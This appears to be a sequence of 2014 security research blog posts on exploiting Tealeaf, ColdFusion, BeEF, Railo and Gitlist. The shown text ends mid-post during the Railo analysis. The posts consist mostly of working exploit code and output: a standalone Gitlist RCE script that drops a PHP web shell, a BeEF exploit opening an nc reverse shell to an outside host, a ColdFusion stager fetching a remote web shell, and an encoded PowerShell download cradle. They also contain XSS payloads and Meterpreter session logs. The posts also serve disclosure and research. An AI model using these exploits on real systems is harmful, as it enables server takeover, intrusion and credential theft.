Tealeaf Technologies was purchased by IBM in May of 2012, and is a customer buying analytics application. Essentially, an administrator will configure a Tealeaf server that accepts analytic data from remote servers, which it then generates various models, graphs, reports, etc based on the aggregate of data. Their analytics status/server monitoring application is vulnerable to a fairly trivial OS command injection vulnerability, as well as local file inclusion. This vulnerability was discovered on a PCI engagement against a large retailer; the LFI was used to pull PHP files and hunt for RCE.

The entire application is served up by default on port 8080 and is developed in PHP. Authentication by default is disabled, however, support for Basic Auth appears to exist. This interface allows administrators access to statistics, logs, participating servers, and more. Contained therein is the ability to obtain application logs, such as configuration, maintenance, access, and more. The log parameter is vulnerable to LFI:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
if(array_key_exists("log", $params))
$path = $config->logfiledir() . "/" . $params["log"];


$file = basename($path);
$size = filesize($path);

// Set the cache-control and expiration date so that the file expires
// immediately after download.
//
$rfc1123date = gmdate('D, d M Y H:i:s T', 1);
header('Cache-Control: max-age=0, must-revalidate, post-check=0, pre-check=0');
header("Expires: " . $rfc1123date);

header("Content-Type: application/octet-stream");
header("Content-Disposition: attachment; filename=$file;");
header("Content-Length: $size;");

readfile($path);

The URL then is http://host:8080/download.php?log=../../../etc/passwd

Tealeaf also suffers from a rather trivial remote OS command injection vulnerability. Under the Delivery tab, there exists the option to ping remote servers that send data back to the mothership. Do you see where this is going?

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
if ($_POST["perform_action"] == "testconn") {
    $host = $_POST["testconn_host"];
    $port = $_POST["testconn_port"];
    $use_t = strtolower($_POST["testconn_t"]) == "true" ? true : false;
    $command = $GLOBALS["config"]->testconn_program() . ' ';
    if($use_t)
    $output = trim(shell_command_output($command . $host . " -p " . $port . " -t"));
    else
    $output = trim(shell_command_output($command . $host . " -p " . $port));

    if($output != "") {
        $alert_function = "alert('" . str_replace("\n", "\\n",
        htmlentities($output, ENT_QUOTES)) . "')";
    }

    $_SESSION['delivery']->pending_changes = $orig_pending_changes;
}

And shell_command_output:

1
2
3
4
5
function shell_command_output($command) {
    $result = `$command 2>&1`;
    if (strlen($result) > 0)
    return $result;
}

Harnessing the $host variable, we can inject arbitrary commands to run under the context of the process user, which by default is ctccap. In order to exploit this without hanging processes or goofing up flow, I injected the following as the host variable: 8.8.8.8 -c 1 ; whoami ; ping 8.8.8.8 -c 1.

Timeline

  • 11/08/2013: IBM vulnerability submitted
  • 11/09/2013: IBM acknowledge vulnerability and assign internal advisory ID
  • 12/05/2013: Request for status update
  • 01/06/2014: Second request for status update
  • 01/23/2014: IBM responds with a target patch date set for β€œanother few months”
  • 03/26/2014: IBM posts advisory, assigns CVE-2013-6719 and CVE-2013-6720

Advisory
exploit-db PoC

LFI to shell in Coldfusion 6-10

2 April 2014 at 21:10

ColdFusion has several very popular LFI’s that are often used to fetch CF hashes, which can then be passed or cracked/reversed. A lesser use of this LFI, one that I haven’t seen documented as of yet, is actually obtaining a shell. When you can’t crack or pass, what’s left?

The less-than-obvious solution is to exploit CFML’s parser, which acts much in the same way that PHP does when used in HTML. You can embed PHP into any HTML page, at any location, because of the way the PHP interpreter searches a document for executable code. This is the foundational basis of log poisoning. CFML acts in much the same way, and we can use these LFI’s to inject CFML and execute it on the remote system.

Let’s begin by first identifying the LFI; I’ll be using ColdFusion 8 as example. CF8’s LFI lies in the locale parameter:

1
http://192.168.1.219:8500/CFIDE/administrator/enter.cfm?local=../../../../../../../../ColdFusion8\logs\application.log%00en

When exploited, this will dump the contents of application.log, a logging file that stores error messages.

We can write to this file by triggering an error, such as attempting to access a nonexistent CFML page. This log also fails to sanitize data, allowing us to inject any sort of characters we want; including CFML code.

The idea for this is to inject a simple stager payload that will then pull down and store our real payload; in this case, a web shell (something like fuze). The stager I came up with is as follows:

1
<cfhttp method='get' url='#ToString(ToBinary('aHR0cDovLzE5Mi4xNjguMS45Nzo4MDAwL2NtZC5jZm1s'))#' path='#ExpandPath(ToString(ToBinary('Li4vLi4v')))#' file='cmd.cfml'>

The cfhttp tag is used to execute an HTTP request for our real payload, the URL of which is base64’d to avoid some encoding issues with forward slashes. We then expand the local path to ../../ which drops us into wwwroot, which is the first directory accessible from the web server.

Once the stager is injected, we only need to exploit the LFI to retrieve the log file and execute our CFML code:

Which we can then access from the root directory:

A quick run of this in clusterd:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
$ ./clusterd.py -i 192.168.1.219 -a coldfusion -p8500 -v8 --deployer lfi_stager --deploy ./src/lib/resources/cmd.cfml 

        clusterd/0.2.1 - clustered attack toolkit
            [Supporting 5 platforms]

 [2014-04-02 11:28PM] Started at 2014-04-02 11:28PM
 [2014-04-02 11:28PM] Servers' OS hinted at windows
 [2014-04-02 11:28PM] Fingerprinting host '192.168.1.219'
 [2014-04-02 11:28PM] Server hinted at 'coldfusion'
 [2014-04-02 11:28PM] Checking coldfusion version 8.0 ColdFusion Manager...
 [2014-04-02 11:28PM] Matched 1 fingerprints for service coldfusion
 [2014-04-02 11:28PM]   ColdFusion Manager (version 8.0)
 [2014-04-02 11:28PM] Fingerprinting completed.
 [2014-04-02 11:28PM] Injecting stager...
 [2014-04-02 11:28PM] Waiting for remote server to download file [7s]]
 [2014-04-02 11:28PM] cmd.cfml deployed at /cmd.cfml
 [2014-04-02 11:28PM] Finished at 2014-04-02 11:28PM

The downside to this method is remnance in a log file, which cannot be purged unless the CF server is shutdown (except in CF10). It also means that the CFML file, if using the web shell, will be hanging around the filesystem. An alternative is to inject a web shell that exists on-demand, that is, check if an argument is provided to the LFI and only parse and execute then.

A working deployer for this can be found in the latest release of clusterd (v0.2.1). It is also worth noting that this method is applicable to other CFML engines; details on that, and a working proof of concept, in the near future.

rce in browser exploitation framework (BeEF)

14 May 2014 at 02:57

Let me preface this post by saying that this vulnerability is already fixed, and was caught pretty early during the development process. The vulnerability was originally introduced during a merge for the new DNS extension, and was promptly patched by antisnatchor on 03022014. Although this vulnerability was caught fairly quickly, it still made it into the master branch. I post this only because I’ve seen too many penetration testers leaving their tools externally exposed, often with default credentials.

The vulnerability is a trivial one, but is capable of returning a reverse shell to an attacker. BeEF exposes a REST API for modules and scripts to use; useful for dumping statistics, pinging hooked browsers, and more. It’s quite powerful. This can be accessed by simply pinging http://127.0.0.1:3000/api/ and providing a valid token. This token is static across a single session, and can be obtained by sending a POST to http://127.0.0.1:3000/api/admin/login with appropriate credentials. Default credentials are beef:beef, and I don’t know many users that change this right away. It’s also of interest to note that the throttling code does not exist in the API login routine, so a brute force attack is possible here.

The vulnerability lies in one of the exposed API functions, /rule. The code for this was as follows:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
# Adds a new DNS rule
        post '/rule' do
          begin
            body = JSON.parse(request.body.read)

            pattern = body['pattern']
            type = body['type']
            response = body['response']

            # Validate required JSON keys
            unless [pattern, type, response].include?(nil)
              # Determine whether 'pattern' is a String or Regexp
              begin

                pattern_test = eval pattern
                pattern = pattern_test if pattern_test.class == Regexp
   #             end
              rescue => e;
              end

The obvious flaw is the eval on user-provided data. We can exploit this by POSTing a new DNS rule with a malicious pattern:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
import requests
import json
import sys

def fetch_default(ip):
    url = 'http://%s:3000/api/admin/login' % ip
    headers = { 'Content-Type' : 'application/json; charset=UTF-8' }
    data = { 'username' : 'beef', 'password' : 'beef' }

    response = requests.post(url, headers=headers, data=json.dumps(data))
    if response.status_code is 200 and json.loads(response.content)['success']:
        return json.loads(response.content)['token']

try:
    ip = '192.168.1.6'

    if len(sys.argv) > 1:
        token = sys.argv[1]
    else:
        token = fetch_default(ip)

    if not token:
        print 'Could not get auth token'
        sys.exit(1)

    url = 'http://%s:3000/api/dns/rule?token=%s' % (ip, token)
    sploit = '%x(nc 192.168.1.97 4455 -e /bin/bash)'

    headers = { 'Content-Type' : 'application/json; charset=UTF-8' }
    data = { 'pattern' : sploit,
             'type' : 'A',
             'response' : [ '127.0.0.1' ]
           }

    response = requests.post(url, headers=headers, data=json.dumps(data))
    print response.status_code
except Exception, e:
    print e

You could execute ruby to grab a shell, but BeEF restricts some of the functions we can use (such as exec or system).

There’s also an instance of LFI, this time using the server API. /api/server/bind allows us to mount files at the root of the BeEF web server. The path defaults to the current path, but can be traversed out of:

1
2
3
4
5
6
7
8
9
def run_lfi(ip, token):
    url = 'http://%s:3000/api/server/bind?token=%s' % (ip, token)
    headers = { 'Content-Type' : 'application/json'}
    data = { 'mount' : "/tmp.txt",
             'local_file' : "/../../../etc/passwd"
           }

    response = requests.post(url, headers=headers, data=json.dumps(data))
    print response.status_code

We can then hit our server at /tmp.txt for /etc/passwd. Though this appears to be intended behavior, and perhaps labeling it an LFI is a misnomer, it is still yet another example of why you should not expose these tools externally with default credentials. Default credentials are just bad, period. Stop it.

railo security - part one - intro

25 June 2014 at 21:00

Part one – intro
Part two – post-authentication rce
Part three – pre-authentication lfi
Part four – pre-authentication rce

Railo is an open-source alternative to the popular Coldfusion application server, implementing a FOSSy CFML engine and application server. It emulates Coldfusion in a variety of ways, mainly features coming straight from the CF world, along with several of it’s own unique features (clustered servers, a plugin architecture, etc). In this four-part series, we’ll touch on how Railo, much like Coldfusion, can be used to gain access to a system or network of systems. I will also be examining several pre-authentication RCE vulnerabilities discovered in the platform during this audit. I’ll be pimping clusterd throughout to exemplify how it can help achieve some of these goals. These posts are the result of a combined effort between myself and Stephen Breen (@breenmachine).

I’ll preface this post with a quick rundown on what we’re working with; public versions of Railo run from versions 3.0 to 4.2, with 4.2.1 being the latest release as of posting. The code is also freely available on Github; much of this post’s code samples have been taken from the 4.2 branch or the master. Hashes:

1
2
3
4
$ git branch
* master
$ git rev-parse master
694e8acf1a762431eab084da762a0abbe5290f49

And a quick rundown of the code:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
$ cloc ./
    3689 text files.
    3571 unique files.                                          
     151 files ignored.

http://cloc.sourceforge.net v 1.60  T=7.74 s (452.6 files/s, 60622.4 lines/s)
---------------------------------------------------------------------------------
Language                       files          blank        comment           code
---------------------------------------------------------------------------------
Java                            2786          66639          69647         258015
ColdFusion                       315           5690           3089          35890
ColdFusion CFScript              352           4377            643          15856
XML                               22            526            563           5773
Javascript                        14             46            252            733
Ant                                4             38             70            176
DTD                                4            283            588            131
CSS                                5             52             16             77
HTML                               1              0              0              1
---------------------------------------------------------------------------------
SUM:                            3503          77651          74868         316652
---------------------------------------------------------------------------------

Railo has two separate administrative web interfaces; server and web. The two interfaces segregate functionality out into these categories; managing the actual server and managing the content served up by the server. Server is available at http://localhost:8888/railo-context/admin/server.cfm and web is available at http://localhost:8888/railo-context/admin/web.cfm. Both interfaces are configured with a single, shared password that is set AFTER the site has been initialized. That is, the first person to hit the web server gets to choose the password.

Authentication

As stated, authentication requires only a single password, but locks an IP address out if too many failed attempts are performed. The exact logic for this is as follows (web.cfm):

1
2
3
<cfif loginPause and StructKeyExists(application,'lastTryToLogin') and IsDate(application.lastTryToLogin) and DateDiff("s",application.lastTryToLogin,now()) LT loginPause>
        <cfset login_error="Login disabled until #lsDateFormat(DateAdd("s",loginPause,application.lastTryToLogin))# #lsTimeFormat(DateAdd("s",loginPause,application.lastTryToLogin),'hh:mm:ss')#">
    <cfelse>

A Remember Me For setting allows an authenticated session to last until logout or for a specified amount of time. In the event that a cookie is saved for X amount of time, Railo actually encrypts the user’s password and stores it as the authentication cookie. Here’s the implementation of this:

1
<cfcookie expires="#DateAdd(form.rememberMe,1,now())#" name="railo_admin_pw_#ad#" value="#Encrypt(form["login_password"&ad],cookieKey,"CFMX_COMPAT","hex")#">

That’s right; a static key, defined as <cfset cookieKey="sdfsdf789sdfsd">, is used as the key to the CFMX_COMPAT encryption algorithm for encrypting and storing the user’s password client-side. This is akin to simply base64’ing the password, as symmetric key security is dependant upon the secrecy of this shared key.

To then verify authentication, the cookie is decrypted and compared to the current password (which is also known; more on this later):

1
2
3
4
5
6
7
<cfif not StructKeyExists(session,"password"&request.adminType) and StructKeyExists(cookie,'railo_admin_pw_#ad#')>
    <cfset fromCookie=true>
    <cftry>
        <cfset session["password"&ad]=Decrypt(cookie['railo_admin_pw_#ad#'],cookieKey,"CFMX_COMPAT","hex")>
        <cfcatch></cfcatch>
    </cftry>
</cfif>

For example, if my stored cookie was RAILO_ADMIN_PW_WEB=6802AABFAA87A7, we could decrypt this with a simple CFML page:

1
2
<cfset tmp=Decrypt("6802AABFAA87A7", "sdfsdf789sdfsd", "CFMX_COMPAT", "hex")>
<cfdump var="#tmp#">

This would dump my plaintext password (which, in this case, is β€œdefault”). This ups the ante with XSS, as we can essentially steal plaintext credentials via this vector. Our cookie is graciously set without HTTPOnly or Secure: Set-Cookie: RAILO_ADMIN_PW_WEB=6802AABFAA87A7;Path=/;Expires=Sun, 08-Mar-2015 06:42:31 GMT._

Another worthy mention is the fact that the plaintext password is stored in the session struct, as shown below:

1
<cfset session["password"&request.adminType]=form["login_password"&request.adminType]>

In order to dump this, however, we’d need to be able to write a CFM file (or code) within the context of web.cfm. As a test, I’ve placed a short CFM file on the host and set the error handler to invoke it. test.cfm:

1
<cfdump var="#session#">

We then set the template handler to this file:

If we now hit a non-existent page, /railo-context/xx.cfm for example, we’ll trigger the cfm and get our plaintext password:

XSS

XSS is now awesome, because we can fetch the server’s plaintext password. Is there XSS in Railo?

Submitting to a CFM with malicious arguments triggers an error and injects unsanitized input.

Post-authentication search:

Submitting malicious input into the search bar will effectively sanitize out greater than/less than signs, but not inside of the saved form. Injecting "></form><img src=x onerror=alert(document.cookie)> will, of course, pop-up the cookie.

How about stored XSS?

A malicious mapping will trigger whenever the page is loaded; the only caveat being that the path must start with a /, and you cannot use the script tag. Trivial to get around with any number of different tags.

Speaking of, let’s take a quick look at the sanitization routines. They’ve implemented their own routines inside of ScriptProtect.java, and it’s a very simple blacklist:

1
2
3
  public static final String[] invalids=new String[]{
        "object", "embed", "script", "applet", "meta", "iframe"
    };

They iterate over these values and perform a simple compare, and if a bad tag is found, they simply replace it:

1
2
3
4
5
6
7
8
9
if(compareTagName(tagName)) {
            if(sb==null) {
                sb=new StringBuffer();
                last=0;
            }
            sb.append(str.substring(last,index+1));
            sb.append("invalidTag");
            last=endIndex;
        }

It doesn’t take much to evade this filter, as I’ve already described.

CSRF kinda fits in here, how about CSRF? Fortunately for users, and unfortunately for pentesters, there’s not much we can do. Although Railo does not enforce authentication for CFML/CFC pages, it does check read/write permissions on all accesses to the backend config file. This is configured in the Server interface:

In the above image, if Access Write was configured to open, any user could submit modifications to the back-end configuration, including password resets, task scheduling, and more. Though this is sufficiently locked down by default, this could provide a nice backdoor.

Deploying

Much like Coldfusion, Railo features a task scheduler that can be used to deploy shells. A run of this in clusterd can be seen below:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
$ ./clusterd.py -i192.168.1.219 -a railo -v4.1 --deploy ./src/lib/resources/cmd.cfml --deployer task --usr-auth default

        clusterd/0.2.1 - clustered attack toolkit
            [Supporting 6 platforms]

 [2014-05-01 10:04PM] Started at 2014-05-01 10:04PM
 [2014-05-01 10:04PM] Servers' OS hinted at windows
 [2014-05-01 10:04PM] Fingerprinting host '192.168.1.219'
 [2014-05-01 10:04PM] Server hinted at 'railo'
 [2014-05-01 10:04PM] Checking railo version 4.1 Railo Server...
 [2014-05-01 10:04PM] Checking railo version 4.1 Railo Server Administrator...
 [2014-05-01 10:04PM] Checking railo version 4.1 Railo Web Administrator...
 [2014-05-01 10:04PM] Matched 3 fingerprints for service railo
 [2014-05-01 10:04PM]   Railo Server (version 4.1)
 [2014-05-01 10:04PM]   Railo Server Administrator (version 4.1)
 [2014-05-01 10:04PM]   Railo Web Administrator (version 4.1)
 [2014-05-01 10:04PM] Fingerprinting completed.
 [2014-05-01 10:04PM] This deployer (schedule_task) requires an external listening port (8000).  Continue? [Y/n] > 
 [2014-05-01 10:04PM] Preparing to deploy cmd.cfml..
 [2014-05-01 10:04PM] Creating scheduled task...
 [2014-05-01 10:04PM] Task cmd.cfml created, invoking...
 [2014-05-01 10:04PM] Waiting for remote server to download file [8s]]
 [2014-05-01 10:04PM] cmd.cfml deployed to /cmd.cfml
 [2014-05-01 10:04PM] Cleaning up...
 [2014-05-01 10:04PM] Finished at 2014-05-01 10:04PM

This works almost identically to the Coldfusion scheduler, and should not be surprising.

One feature Railo has that isn’t found in Coldfusion is the Extension or Plugin architecture; this allows custom extensions to run in the context of the Railo server and execute code and tags. These extensions do not have access to the cfadmin tag (without authentication, that is), but we really don’t need that for a simple web shell. In the event that the Railo server is configured to not allow outbound traffic (hence rendering the Task Scheduler useless), this could be harnessed instead.

Railo allows extensions to be uploaded directly to the server, found here:

Developing a plugin is sort of confusing and not exacty clear via their provided Github documentation, however the simplest way to do this is grab a pre-existing package and simply replace one of the functions with a shell.

That about wraps up part one of our dive into Railo security; the remaining three parts will focus on several different vulnerabilities in the Railo framework, and how they can be lassoed together for pre-authentication RCE.

gitlist - commit to rce

29 June 2014 at 22:00

Gitlist is a fantastic repository viewer for Git; it’s essentially your own private Github without all the social networking and glitzy features of it. I’ve got a private Gitlist that I run locally, as well as a professional instance for hosting internal projects. Last year I noticed a bug listed on their Github page that looked a lot like an exploitable hole:

1
Oops! sh: 1: Syntax error: EOF in backquote substitution

I commented on its exploitability at the time, and though the hole appears to be closed, the issue still remains. I returned to this during an install of Gitlist and decided to see if there were any other bugs in the application and, as it turns out, there are a few. I discovered a handful of bugs during my short hunt that I’ll document here, including one anonymous remote code execution vulnerability that’s quite trivial to pop. These bugs were reported to the developers and CVE-2014-4511 was assigned. These issues were fixed in version 0.5.0.

The first bug is actually more of a vulnerability in a library Gitlist uses, Gitter (same developers). Gitter allows developers to interact with Git repositories using Object-Oriented Programming (OOP). During a quick once-over of the code, I noticed the library shelled out quite a few times, and one in particular stood out to me:

1
$hash = $this->getClient()->run($this, "log --pretty=\"%T\" --max-count=1 $branch");```

This can be found in Repository.php of the Gitter library, and is invoked from TreeController.php in Gitlist. As you can imagine, there is no sanitization on the $branch variable. This essentially means that anyone with commit access to the repository can create a malicious branch name (locally or remotely) and end up executing arbitrary commands on the server.

The tricky part comes with the branch name; git actually has a couple restrictions on what can and cannot be part of a branch name. This is all defined and checked inside of refs.c, and the rules are simply defined as (starting at line 33):

  1. Cannot begin with .
  2. Cannot have a double dot (..)
  3. Cannot contain ASCII control characters (?, [, ], ~, ^, :, \)
  4. End with /
  5. End with .lock
  6. Contain a backslash
  7. Cannot contain a space

With these restrictions in mind, we can begin crafting our payload.

My first thought was, because Gitlist is written in PHP, to drop a web shell. To do so we must print our payload out to a file in a location accessible to the web root. As it so happens, we have just the spot to do it. According to INSTALL.md, the following is required:

1
2
3
cd /var/www/gitlist
mkdir cache
chmod 777 cache

This is perfect; we have a reliable location with 777 permissions and it’s accessible from the web root (/gitlist/cache/my_shell.php). Second step is to come up with a payload that adheres to the Git branch rules while still giving us a shell. What I came up with is as follows:

1
# git checkout -b "|echo\$IFS\"PD9zeXN0ZW0oJF9SRVFVRVNUWyd4J10pOz8+Cg==\"|base64\$IFS-d>/var/www/gitlist/cache/x"

In order to inject PHP, we need the <? and ?> headers, so we need to encode our PHP payload. We use the $IFS environment variable (Internal Field Separator) to plug in our spaces and echo the base64’d shell into base64 for decoding, then pipe that into our payload location.

And it works flawlessly.

Though you might say, β€œHey if you have commit access it’s game over”, but I’ve seen several instances of this not being the case. Commit access does not necessarily equate to shell access.

The second vulnerability I discovered was a trivial RCE, exploitable by anonymous users without any access. I first noticed the bug while browsing the source code, and ran into this:

1
$blames = $repository->getBlame("$branch -- \"$file\"");

Knowing how often they shell out, and the complete lack of input sanitization, I attempted to pop this by trivially evading the double quotes and injecting grave accents:

1
http://localhost/gitlist/my_repo.git/blame/master/""`whoami`

And what do you know?

Curiousity quickly overcame me, and I attempted another vector:

Faster my fingers flew:

It’s terrifyingly clear that everything is an RCE. I developed a rough PoC to drop a web shell on the system. A test run of this is below:

1
2
3
4
5
6
root@droot:~/exploits# python gitlist_rce.py http://192.168.1.67/gitlist/graymatter
[!] Using cache location /var/www/gitlist/cache
[!] Shell dropped; go hit http://192.168.1.67/gitlist/cache/x.php?cmd=ls
root@droot:~/exploits# curl http://192.168.1.67/gitlist/cache/x.php?cmd=id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
root@droot:~/exploits# 

I’ve also developed a Metasploit module for this issue, which I’ll be submitting a PR for soon. A run of it:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
msf exploit(gitlist_rce) > rexploit
[*] Reloading module...

[*] Started reverse handler on 192.168.1.6:4444 
[*] Injecting payload...
[*] Executing payload..
[*] Sending stage (39848 bytes) to 192.168.1.67
[*] Meterpreter session 9 opened (192.168.1.6:4444 -> 192.168.1.67:34241) at 2014-06-21 23:07:01 -0600

meterpreter > sysinfo
Computer    : bryan-VirtualBox
OS          : Linux bryan-VirtualBox 3.2.0-63-generic #95-Ubuntu SMP Thu May 15 23:06:36 UTC 2014 i686
Meterpreter : php/php
meterpreter > 

Source for the standalone Python exploit can be found below.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
from commands import getoutput
import urllib
import sys

""" 
Exploit Title: Gitlist <= 0.4.0 anonymous RCE
Date: 06/20/2014
Author: drone (@dronesec)
Vendor Homepage: http://gitlist.org/
Software link: https://s3.amazonaws.com/gitlist/gitlist-0.4.0.tar.gz
Version: <= 0.4.0
Tested on: Debian 7
More information: 
cve: CVE-2014-4511
"""

if len(sys.argv) <= 1:
    print '%s: [url to git repo] {cache path}' % sys.argv[0]
    print '  Example: python %s http://localhost/gitlist/my_repo.git' % sys.argv[0]
    print '  Example: python %s http://localhost/gitlist/my_repo.git /var/www/git/cache' % sys.argv[0]
    sys.exit(1)

url = sys.argv[1]
url = url if url[-1] != '/' else url[:-1]

path = "/var/www/gitlist/cache"
if len(sys.argv) > 2:
    path = sys.argv[2]

print '[!] Using cache location %s' % path

# payload <?system($_GET['cmd']);?>
payload = "PD9zeXN0ZW0oJF9HRVRbJ2NtZCddKTs/Pgo="

# sploit; python requests does not like this URL, hence wget is used
mpath = '/blame/master/""`echo {0}|base64 -d > {1}/x.php`'.format(payload, path)
mpath = url+ urllib.quote(mpath)

out = getoutput("wget %s" % mpath)
if '500' in out:
    print '[!] Shell dropped; go hit %s/cache/x.php?cmd=ls' % url.rsplit('/', 1)[0]
else:
    print '[-] Failed to drop'
    print out

railo security - part two - post-authentication rce

24 July 2014 at 21:10

Part one – intro
Part two – post-authentication rce
Part three – pre-authentication lfi
Part four – pre-authentication rce

This post continues our dive into Railo security, this time introducing several post-authentication RCE vulnerabilities discovered in the platform. As stated in part one of this series, like ColdFusion, there is a task scheduler that allows authenticated users the ability to write local files. Whilst the existence of this feature sets it as the standard way to shell a Railo box, sometimes this may not work. For example, in the event of stringent firewall rules, or irregular file permissions, or you’d just prefer not to make remote connections, the techniques explored in this post will aid you in this manner.

PHP has an interesting, ahem, feature, where it writes out session information to a temporary file located in a designated path (more). If accessible to an attacker, this file can be used to inject PHP data into, via multiple different vectors such as a User-Agent or some function of the application itself. Railo does sort of the same thing for its Web and Server interfaces, except these files are always stored in a predictable location. Unlike PHP however, the name of the file is not simply the session ID, but is rather a quasi-unique value generated using a mixture of pseudo-random and predictable/leaked information. I’ll dive into this here in a bit.

When a change to the interface is made, or a new page bookmark is created, Railo writes this information out to a session file located at /admin/userdata/. The file is then either created, or an existing one is used, and will be named either web-[value].cfm or server-[value].cfm depending on the interface you’re coming in from. It’s important to note the extension on these files; because of the CFM extension, these files will be parsed by the CFML interpreter looking for CF tags, much like PHP will do. A typical request to add a new bookmark is as follows:

1
GET /railo-context/admin/web.cfm?action=internal.savedata&action2=addfavorite&favorite=server.request HTTP/1.1

The favorite server.request is then written out to a JSON-encoded array object in the session file, as below:

1
{'fullscreen':'true','contentwidth':'1267','favorites':{'server.request':''}}

The next question is then obvious: what if we inject something malicious as a favorite?

1
GET /railo-context/admin/web.cfm?action=internal.savedata&action2=addfavorite&favorite=<cfoutput><cfexecute name="c:\windows\system32\cmd.exe" arguments="/c dir" timeout="10" variable="output"></cfexecute><pre>#output#</pre></cfoutput> HTTP/1.1

Our session file will then read:

1
{'fullscreen':'true','contentwidth':'1267','favorites':{'<cfoutput><cfexecute name="c:\windows\system32\cmd.exe" arguments="/c dir" timeout="10" variable="output"></cfexecute><pre>##output##</pre></cfoutput>':'','server.charset':''}}

Whilst our injected data is written to the file, astute readers will note the double # around our Coldfusion variable. This is ColdFusion’s way of escaping a number sign, and will therefore not reflect our command output back into the page. To my knowledge, there is no way to obtain shell output without the use of the variable tags.

We have two options for popping this: inject a command to return a shell or inject a web shell that simply writes output to a file that is then accessible from the web root. I’ll start with the easiest of the two, which is injecting a command to return a shell.

I’ll use PowerSploit’s Invoke-Shellcode script and inject a Meterpreter shell into the Railo process. Because Railo will also quote our single/double quotes, we need to base64 the Invoke-Expression payload:

1
GET /railo-context/admin/web.cfm?action=internal.savedata&action2=addfavorite&favorite=%3A%3Ccfoutput%3E%3Ccfexecute%20name%3D%22c%3A%5Cwindows%5Csystem32%5Ccmd.exe%22%20arguments%3D%22%2Fc%20PowerShell.exe%20-Exec%20ByPass%20-Nol%20-Enc%20aQBlAHgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQAUwB0AHIAaQBuAGcAKAAnAGgAdAB0AHAAOgAvAC8AMQA5ADIALgAxADYAOAAuADEALgA2ADoAOAAwADAAMAAvAEkAbgB2AG8AawBlAC0AUwBoAGUAbABsAGMAbwBkAGUALgBwAHMAMQAnACkA%22%20timeout%3D%2210%22%20variable%3D%22output%22%3E%3C%2Fcfexecute%3E%3C%2Fcfoutput%3E%27 HTTP/1.1

Once injected, we hit our session page and pop a shell:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
payload => windows/meterpreter/reverse_https
LHOST => 192.168.1.6
LPORT => 4444
[*] Started HTTPS reverse handler on https://0.0.0.0:4444/
[*] Starting the payload handler...
[*] 192.168.1.102:50122 Request received for /INITM...
[*] 192.168.1.102:50122 Staging connection for target /INITM received...
[*] Patched user-agent at offset 663128...
[*] Patched transport at offset 662792...
[*] Patched URL at offset 662856...
[*] Patched Expiration Timeout at offset 663728...
[*] Patched Communication Timeout at offset 663732...
[*] Meterpreter session 1 opened (192.168.1.6:4444 -> 192.168.1.102:50122) at 2014-03-24 00:44:20 -0600

meterpreter > getpid
Current pid: 5064
meterpreter > getuid
Server username: bryan-PC\bryan
meterpreter > sysinfo
Computer        : BRYAN-PC
OS              : Windows 7 (Build 7601, Service Pack 1).
Architecture    : x64 (Current Process is WOW64)
System Language : en_US
Meterpreter     : x86/win32
meterpreter > 

Because I’m using Powershell, this method won’t work in Windows XP or Linux systems, but it’s trivial to use the next method for that (net user/useradd).

The second method is to simply write out the result of a command into a file and then retrieve it. This can trivially be done with the following:

1
':<cfoutput><cfexecute name="c:\windows\system32\cmd.exe" arguments="/c dir > ./webapps/www/WEB-INF/railo/context/output.cfm" timeout="10" variable="output"></cfexecute></cfoutput>'

Note that we’re writing out to the start of web root and that our output file is a CFM; this is a requirement as the web server won’t serve up flat files or txt’s.

Great, we’ve verfied this works. Now, how to actually figure out what the hell this session file is called? As previously noted, the file is saved as either web-[VALUE].cfm or server-[VALUE].cfm, the prefix coming from the interface you’re accessing it from. I’m going to step through the code used for this, which happens to be a healthy mix of CFML and Java.

We’ll start by identifying the session file on my local Windows XP machine: web-a898c2525c001da402234da94f336d55.cfm. This is stored in www\WEB-INF\railo\context\admin\userdata, of which admin\userdata is accessible from the web root, that is, we can directly access this file by hitting railo-context/admin/userdata/[file] from the browser.

When a favorite it saved, internal.savedata.cfm is invoked and searches through the given list for the function we’re performing:

1
2
3
<cfif listFind("addfavorite,removefavorite", url.action2) and structKeyExists(url, "favorite")>
    <cfset application.adminfunctions[url.action2](url.favorite) />
        <cflocation url="?action=#url.favorite#" addtoken="no" />

This calls down into application.adminfunctions with the specified action and favorite-to-save. Our addfavorite function is as follows:

1
2
3
4
5
6
<cffunction name="addfavorite" returntype="void" output="no">
        <cfargument name="action" type="string" required="yes" />
        <cfset var data = getfavorites() />
        <cfset data[arguments.action] = "" />
        <cfset setdata('favorites', data) />
    </cffunction>

Tunneling yet deeper into the rabbit hole, we move forwards into setdata:

1
2
3
4
5
6
7
8
9
<cffunction name="setdata" returntype="void" output="no">
        <cfargument name="key" type="string" required="yes" />
        <cfargument name="value" type="any" required="yes" />
        <cflock name="setdata_admin" timeout="1" throwontimeout="no">
            <cfset var data = loadData() />
            <cfset data[arguments.key] = arguments.value />
            <cfset writeData() />
        </cflock>
    </cffunction>

This function actually reads in our data file, inserts our new favorite into the data array, and writes it back down. Our question is β€œhow do you know the file?”, so naturally we need to head into loadData:

1
2
3
 <cffunction name="loadData" access="private" output="no" returntype="any">
        <cfset var dataKey = getDataStoreName() />
            [..snip..]

And yet deeper we move, into getDataStoreName:

1
2
3
<cffunction name="getDataStoreName" access="private" output="no" returntype="string">
        <cfreturn "#request.admintype#-#getrailoid()[request.admintype].id#" />
    </cffunction>

At last we’ve reached the apparent event horizon of this XML black hole; we see the return will be of form web-#getrailoid()[web].id#, substituting in web for request.admintype.

I’ll skip some of the digging here, but lets fast forward to Admin.java:

1
2
3
4
 private String getCallerId() throws IOException {
        if(type==TYPE_WEB) {
